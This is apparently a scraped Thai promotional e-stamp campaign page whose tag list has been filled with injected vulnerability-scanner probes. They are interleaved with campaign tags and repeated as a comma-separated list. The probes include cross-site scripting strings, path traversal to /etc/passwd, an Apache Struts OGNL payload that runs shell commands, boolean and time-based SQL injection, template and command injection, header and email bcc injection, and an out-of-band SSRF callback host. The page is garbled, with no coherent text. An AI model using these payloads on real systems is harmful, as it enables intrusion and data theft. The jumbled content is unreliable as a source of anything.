Ads express_promotion express_campaign express_estamp Express_E-stamp keymessage express_campigne howtogetestamp SXGP_E-stamp extrastamp_r8 extrastamp_r9 Promotion_E-Stamp E-Stamp_Promotion e-stamp_promtion stamp_promotion extra_stamp collection2 extra_stamp_launch_tvc15s extra_stamp_salehere " class="scroll-links">"> z--> " class="scroll-links">"'> [removed] " class="scroll-links">[removed]" SRC=//localhost/j> <[removed]qss=7;//<[removed]" class="scroll-links">"'><[removed]qss=7;//<[removed] <META HTTP-EQUIV="refresh" C> <STYLE type="text/css" a=3>BODY{background:url("[removed]qss=7")}</STYLE> <EMBED SRC=//localhost/q.swf AllowScriptAccess=always></EMBED> " class="scroll-links">"'> ' onEvent=X150750924Y4Z " onEvent=X150750924Y4Z < script a=4>qss=7< /script> [removed]_q(y)[removed] <script src=http://localhost/j qss{{q=(2*2.0)}}qss q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA q Qualys_resp_hdr_injection: Vulnerable q Qualys_resp_hdr_injection: Vulnerable ;-- # /* `` , ( 1e309 /../../../../../../../etc/passwd ../../../../../../../etc/passwd //..//..//..//..//..//..//..//etc/passwd //....//....//....//....//....//....//....//etc/passwd ../../../../../../../Windows/System32/drivers/etc/hosts %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))} a(){}phpinfo(); function a |netstat -an http://rfitest/ ";(function(){qxss});// ");(function(){qxss});// ';(function(){qxss});// 9;(function(){qxss});// 9 ;(function(){qxss});// '-qxss()-' */;(function(){qxss});/* "-qxss()-" |aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %> {23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}} ;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */ (23.0231*213.759) aaaa&ping; -n 92 localhost& ping -c2 -i91 localhost |ping -c2 -i91 localhost |ping -c2 -i91 localhost| " class="scroll-links">"'> ' onEvent=X159895492Y4Z " onEvent=X159895492Y4Z " class="scroll-links">"'> ' onEvent=X152955000Y4Z " onEvent=X152955000Y4Z " class="scroll-links">"> " class="scroll-links">'"--!> " class="scroll-links">'"> round2 " class="scroll-links">"'> ' onEvent=X172006160Y4Z " onEvent=X172006160Y4Z was<!--esx-->esi" class="scroll-links">qualyswas<!--esx-->esi round3 round4 stam_promotion round5 phase2_extra_stamp extra_stamp_paepro_phase2 " class="scroll-links">collection2"'> [removed]_q=random(X144331948Y4Z)[removed] collection2 [removed]_q_q=random()[removed]
" class="scroll-links">collection2">
" class="scroll-links">"'> ' onEvent=X144331948Y4Z " onEvent=X144331948Y4Z collection2' [removed]qxss(X144331948Y4Z); <!--#config timefmt="<%A><%B><%d><%Y>" -->qualyswas:<!--#echo var="DATE_LOCAL" --> collection2') or 2634=2634 -- collection2') and 2634=1123 -- collection2') /* or klpry */oR 2634=1511 + 1123 -- aND 1124 collection2' or 3789=3789 -- collection2' and 3789=1391 -- collection2' /* or klpry */oR 3789=2398 + 1391 -- aND 1390 collection2 or 4325=4325 -- collection2 and 4325=2728 -- collection2 /* or klpry */oR 4325=1597 + 2728 -- aND 2729 collection2 or NULL IS NULL collection2 or 6248 IS NULL collection2 oR 6248=2491 + 3757 collection2 and NULL IS NULL collection2 and 7248 IS NULL collection2 aND 7248=2491 + 4757 collection2') or 'swqtp'='swqtp collection2') and 'swqtp'='ptqws collection2') /* or klpry */oR ' aND ptqws'=' aND ptqws collection2' or 'tpklq'='tpklq collection2' and 'tpklq'='xqlkp collection2' /* or klpry */oR ' aND xqlkp'=' aND xqlkp collection21 or 11=11 collection21 or 11=12 collection25 oR 9=8 + 1 collection2' or true() or 'and' = 'and collection2' and false() and 'or' = 'and collection2' or not(false()) or 'true' = 'true collection2 or true() or 'and' = 'and' collection2 and false() and 'or' = 'and' collection2 or not(false()) or 'true' = 'true' collection2" or true() or "and" = "and collection2" and false() and "or" = "and collection2" or not(false()) or "true" = "true collection2WAITFOR DELAY '00:00:29' collection2;WAITFOR DELAY '00:00:29'; collection2);WAITFOR DELAY '00:00:29'-- collection2';WAITFOR DELAY '00:00:29'-- collection2');WAITFOR DELAY '00:00:29'-- collection2',0,0);WAITFOR DELAY'00:00:29'-- collection2 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111) collection2' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + ' collection2;SELECT sleep(29); -- collection2(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/ collection2(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000)) stampx2_teaser extra_stamp_wongnaibeauty_phase2 [removed]_q=random(X157307652Y4Z)[removed] " class="scroll-links">"'> ' onEvent=X157307652Y4Z " onEvent=X157307652Y4Z [removed]qxss(X157307652Y4Z); [removed]_q=random(X141291600Y4Z)[removed] " class="scroll-links">"'> ' onEvent=X141291600Y4Z " onEvent=X141291600Y4Z [removed]qxss(X141291600Y4Z); logos [removed]_q=random(X170296576Y4Z)[removed] " class="scroll-links">"'> ' onEvent=X170296576Y4Z " onEvent=X170296576Y4Z [removed]qxss(X170296576Y4Z); round6 [removed]alert(!)" class="scroll-links">">[removed]alert(!) round7 collection2" [removed]_q=random(X167091256Y4Z)[removed] " class="scroll-links">"'> ' onEvent=X167091256Y4Z " onEvent=X167091256Y4Z [removed]qxss(X167091256Y4Z); round8 drive_redemption [removed]_q=random(X154591620Y4Z)[removed] " class="scroll-links">"'> ' onEvent=X154591620Y4Z " onEvent=X154591620Y4Z [removed]qxss(X154591620Y4Z); ";(function(){qxss});/**/" ");(function(){qxss});/**/" ';(function(){qxss});/**/' [removed][removed]function(){qxss};[removed] extra_stamp_launch_tvc7515s [removed]_q=random(X169005532Y4Z)[removed] " class="scroll-links">"'> ' onEvent=X169005532Y4Z " onEvent=X169005532Y4Z [removed]qxss(X169005532Y4Z); Joe+ bcc:was_engine@43523ba27bc7cc52db017c055f2865a7ebf72f6b.8237785_9490670.3713429209.smtphi01.smtp.eu1.qualysperiscope.com. [removed]_q=random(X153562356Y4Z)[removed] " class="scroll-links">"'> ' onEvent=X153562356Y4Z " onEvent=X153562356Y4Z [removed]qxss(X153562356Y4Z); Joe+ bcc:was_engine@82b35fd8fe4d4202448e836d0f55bdc56d253b09.8284181_9490670.1742545902.smtphi01.smtp.eu1.qualysperiscope.com. [removed]_q=random(X148104920Y4Z)[removed] " class="scroll-links">"'> ' onEvent=X148104920Y4Z " onEvent=X148104920Y4Z [removed]qxss(X148104920Y4Z); Joe+ bcc:was_engine@904ed77e46d1cfdfcf282ae362044ed5a92623ce.8286635_9490670.1721903345.smtphi01.smtp.eu1.qualysperiscope.com. http://ecce289c142cb6e9160284acf7ca0492209293c6.8286635_9490670.3085565927.ssrf01.ssrf.eu1.qualysperiscope.com. collection2WAITFOR DELAY '00:00:31' collection2;WAITFOR DELAY '00:00:31'; collection2);WAITFOR DELAY '00:00:31'-- collection2';WAITFOR DELAY '00:00:31'-- collection2');WAITFOR DELAY '00:00:31'-- collection2',0,0);WAITFOR DELAY'00:00:31'-- collection2 + (SELECT 0 FROM (SELECT SLEEP(31))qsqli_1111) collection2' + (SELECT 0 FROM (SELECT SLEEP(31))qsqli_2222) + ' collection2;SELECT sleep(31); -- collection2(SELECT 0 FROM (SELECT SLEEP(31))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(31))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(31))qsqli_3333); -- OR"*/ collection2(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(30*1000)) lastday_stampcolleciton
,z-->,"'>,[removed],[removed]" SRC=//localhost/j>,"'><[removed]qss=7;//<[removed],,<META HTTP-EQUIV="refresh" C>,<STYLE type="text/css" a=3>BODY{background:url("[removed]qss=7")}</STYLE>,<EMBED SRC=//localhost/q.swf AllowScriptAccess=always></EMBED>,"'>,' onEvent=X150750924Y4Z ," onEvent=X150750924Y4Z ,< script a=4>qss=7< /script>,[removed]_q(y)[removed],<script src=http://localhost/j ,qss{{q=(2*2.0)}}qss,q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA,q Qualys_resp_hdr_injection: Vulnerable,q Qualys_resp_hdr_injection: Vulnerable ,;-- ,#,/*,``,,,(,1e309,/../../../../../../../etc/passwd,../../../../../../../etc/passwd,//..//..//..//..//..//..//..//etc/passwd,//....//....//....//....//....//....//....//etc/passwd,../../../../../../../Windows/System32/drivers/etc/hosts,%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())},%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))},a(){}phpinfo(); function a,|netstat -an ,http://rfitest/,";(function(){qxss});//,");(function(){qxss});//,';(function(){qxss});//,9;(function(){qxss});//,9 ;(function(){qxss});//,'-qxss()-',*/;(function(){qxss});/*,"-qxss()-", |aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %>,{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}},;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */,(23.0231*213.759),aaaa&ping; -n 92 localhost&,ping -c2 -i91 localhost,|ping -c2 -i91 localhost,|ping -c2 -i91 localhost|,"'>,' onEvent=X159895492Y4Z ," onEvent=X159895492Y4Z ,"'>,' onEvent=X152955000Y4Z ," onEvent=X152955000Y4Z ,">,'"--!>,'">,round2,"'>,' onEvent=X172006160Y4Z ," onEvent=X172006160Y4Z ,qualyswas<!--esx-->esi,round3,round4,stam_promotion,round5,phase2_extra_stamp,extra_stamp_paepro_phase2,collection2"'>,[removed]_q=random(X144331948Y4Z)[removed],collection2 [removed]_q_q=random()[removed],collection2">
,"'>,' onEvent=X144331948Y4Z ," onEvent=X144331948Y4Z ,collection2',[removed]qxss(X144331948Y4Z);,<!--#config timefmt="<%A><%B><%d><%Y>" -->qualyswas:<!--#echo var="DATE_LOCAL" -->,collection2') or 2634=2634 -- ,collection2') and 2634=1123 -- ,collection2') /* or klpry */oR 2634=1511 + 1123 -- aND 1124,collection2' or 3789=3789 -- ,collection2' and 3789=1391 -- ,collection2' /* or klpry */oR 3789=2398 + 1391 -- aND 1390,collection2 or 4325=4325 -- ,collection2 and 4325=2728 -- ,collection2 /* or klpry */oR 4325=1597 + 2728 -- aND 2729,collection2 or NULL IS NULL ,collection2 or 6248 IS NULL ,collection2 oR 6248=2491 + 3757 ,collection2 and NULL IS NULL ,collection2 and 7248 IS NULL ,collection2 aND 7248=2491 + 4757 ,collection2') or 'swqtp'='swqtp,collection2') and 'swqtp'='ptqws,collection2') /* or klpry */oR ' aND ptqws'=' aND ptqws,collection2' or 'tpklq'='tpklq,collection2' and 'tpklq'='xqlkp,collection2' /* or klpry */oR ' aND xqlkp'=' aND xqlkp,collection21 or 11=11,collection21 or 11=12,collection25 oR 9=8 + 1,collection2' or true() or 'and' = 'and,collection2' and false() and 'or' = 'and,collection2' or not(false()) or 'true' = 'true,collection2 or true() or 'and' = 'and' ,collection2 and false() and 'or' = 'and' ,collection2 or not(false()) or 'true' = 'true' ,collection2" or true() or "and" = "and,collection2" and false() and "or" = "and,collection2" or not(false()) or "true" = "true,collection2WAITFOR DELAY '00:00:29',collection2;WAITFOR DELAY '00:00:29';,collection2);WAITFOR DELAY '00:00:29'-- ,collection2';WAITFOR DELAY '00:00:29'-- ,collection2');WAITFOR DELAY '00:00:29'-- ,collection2',0,0);WAITFOR DELAY'00:00:29'-- ,collection2 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111) ,collection2' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + ',collection2;SELECT sleep(29); --,collection2(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/,collection2(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000)),stampx2_teaser,extra_stamp_wongnaibeauty_phase2,[removed]_q=random(X157307652Y4Z)[removed],"'>,' onEvent=X157307652Y4Z ," onEvent=X157307652Y4Z ,[removed]qxss(X157307652Y4Z);,[removed]_q=random(X141291600Y4Z)[removed],"'>,' onEvent=X141291600Y4Z ," onEvent=X141291600Y4Z ,[removed]qxss(X141291600Y4Z);,logos,[removed]_q=random(X170296576Y4Z)[removed],"'>,' onEvent=X170296576Y4Z ," onEvent=X170296576Y4Z ,[removed]qxss(X170296576Y4Z);,round6,">[removed]alert(!),round7,collection2",[removed]_q=random(X167091256Y4Z)[removed],"'>,' onEvent=X167091256Y4Z ," onEvent=X167091256Y4Z ,[removed]qxss(X167091256Y4Z);,round8,drive_redemption,[removed]_q=random(X154591620Y4Z)[removed],"'>,' onEvent=X154591620Y4Z ," onEvent=X154591620Y4Z ,[removed]qxss(X154591620Y4Z);,";(function(){qxss});/**/",");(function(){qxss});/**/",';(function(){qxss});/**/',[removed][removed]function(){qxss};[removed],extra_stamp_launch_tvc7515s,[removed]_q=random(X169005532Y4Z)[removed],"'>,' onEvent=X169005532Y4Z ," onEvent=X169005532Y4Z ,[removed]qxss(X169005532Y4Z);,Joe+ bcc:was_engine@43523ba27bc7cc52db017c055f2865a7ebf72f6b.8237785_9490670.3713429209.smtphi01.smtp.eu1.qualysperiscope.com.,[removed]_q=random(X153562356Y4Z)[removed],"'>,' onEvent=X153562356Y4Z ," onEvent=X153562356Y4Z ,[removed]qxss(X153562356Y4Z);,Joe+ bcc:was_engine@82b35fd8fe4d4202448e836d0f55bdc56d253b09.8284181_9490670.1742545902.smtphi01.smtp.eu1.qualysperiscope.com.,[removed]_q=random(X148104920Y4Z)[removed],"'>,' onEvent=X148104920Y4Z ," onEvent=X148104920Y4Z ,[removed]qxss(X148104920Y4Z);,Joe+ bcc:was_engine@904ed77e46d1cfdfcf282ae362044ed5a92623ce.8286635_9490670.1721903345.smtphi01.smtp.eu1.qualysperiscope.com.,http://ecce289c142cb6e9160284acf7ca0492209293c6.8286635_9490670.3085565927.ssrf01.ssrf.eu1.qualysperiscope.com.,collection2WAITFOR DELAY '00:00:31',collection2;WAITFOR DELAY '00:00:31';,collection2);WAITFOR DELAY '00:00:31'-- ,collection2';WAITFOR DELAY '00:00:31'-- ,collection2');WAITFOR DELAY '00:00:31'-- ,collection2',0,0);WAITFOR DELAY'00:00:31'-- ,collection2 + (SELECT 0 FROM (SELECT SLEEP(31))qsqli_1111) ,collection2' + (SELECT 0 FROM (SELECT SLEEP(31))qsqli_2222) + ',collection2;SELECT sleep(31); --,collection2(SELECT 0 FROM (SELECT SLEEP(31))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(31))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(31))qsqli_3333); -- OR"*/,collection2(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(30*1000)),lastday_stampcolleciton">

คัดลอกลิงก์เรียบร้อย

script>